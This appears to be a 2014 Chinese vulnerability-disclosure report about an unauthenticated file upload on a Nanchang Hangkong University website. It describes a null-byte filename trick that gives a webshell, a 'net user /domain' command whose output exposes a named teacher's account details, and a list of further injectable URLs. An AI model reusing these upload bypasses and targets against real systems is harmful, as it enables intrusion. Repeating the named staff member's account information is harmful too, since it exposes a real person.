漏洞概要
关注数(24)
关注此漏洞
漏洞标题:南昌航空大学某站权限控制不严导致任意文件上传getshell威胁内网
提交时间:2014-11-21 17:22
修复时间:2015-01-05 17:24
公开时间:2015-01-05 17:24
漏洞类型:文件上传导致任意代码执行
危害等级:高
自评Rank:15
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情
披露状态:
2014-11-21: 细节已通知厂商并且等待厂商处理中
2014-11-21: 厂商已经确认,细节仅向厂商公开
2014-12-01: 细节向核心白帽子及相关领域专家公开
2014-12-11: 细节向普通白帽子公开
2014-12-21: 细节向实习白帽子公开
2015-01-05: 细节向公众公开
简要描述:
某分站上传页面权限控制不严,不登陆情况下可以上传任意文件
详细说明:
漏洞URL:http://zdh.nchu.edu.cn/admin/picupload.asp
直接选择一个图片木马
dat/pictures/1.asp%00 %00进行URL转码,提交就可以得到shell
虽然服务器安全性做的不错,无法提权,但是可以执行命令
通过google信息搜索,可以得知这些数字就是你校老师的工号
C:\Windows\SysWOW64\inetsrv\> net user 70623 /domain
这项请求将在域 nchu.edu.cn 的域控制器处理。
用户名 70623
全名 郭晓春
注释
用户的注释
国家/地区代码 000 (系统默认值)
帐户启用 Yes
帐户到期 从不
上次设置密码 2014/10/8 15:59:56
密码到期 从不
密码可更改 2014/10/8 15:59:56
需要密码 Yes
用户可以更改密码 Yes
允许的工作站 All
登录脚本
用户配置文件
主目录
上次登录 2014/11/19 11:15:38
可允许的登录小时数 All
本地组成员
全局组成员 *Domain Users
命令成功完成。
可以通过暴力破解,或者其他社工信息 拨入VPN,邮箱等应用,甚至威胁整个域。
http://mj.nchu.edu.cn/mjNewsInfo.asp?id=101 sql注入
http://mj.nchu.edu.cn/upfilea.asp 任意文件上传
http://wenfa.nchu.edu.cn/ 遍历目录
http://wenfa.nchu.edu.cn/md.aspx?t=0&c=f5 延时盲注 就不一一提交了,直接发上来了
本来还有更多,没保存,电脑更新补丁重启了。。
漏洞证明:
http://zdh.nchu.edu.cn/dat/pictures/1.asp
从数据库中获得一个老师帐号
该帐号可以进一步登陆其他网站后台,并且可以通过搜索可以得到该老师管理的一些网站,同理数据库中还有别的老师的帐号密码,可以控制更多的帐号密码,通过上面得到的域信息,可以组合密码.
修复方案:
把这台服务器直接放在DMZ,那么这些小网站的漏洞也无伤大雅,其他分站漏洞也很多,移动到DMZ可以简单省事,建议在服务器上安装安全软件,很多分站都有被入侵的痕迹,可以严查
漏洞回应
厂商回应:
危害等级:低
漏洞Rank:3
确认时间:2014-11-21 18:08
厂商回复:
谢谢提醒,由于目前各单位的技术实力有限,网站漏洞层出不穷。学校正在通过网站群的方式来统计建立和管理。由于这台服务器加了域,因此可以读取域的信息,现在已经退域处理了。感谢你的反馈。
最新状态:
暂无
漏洞评价:
评论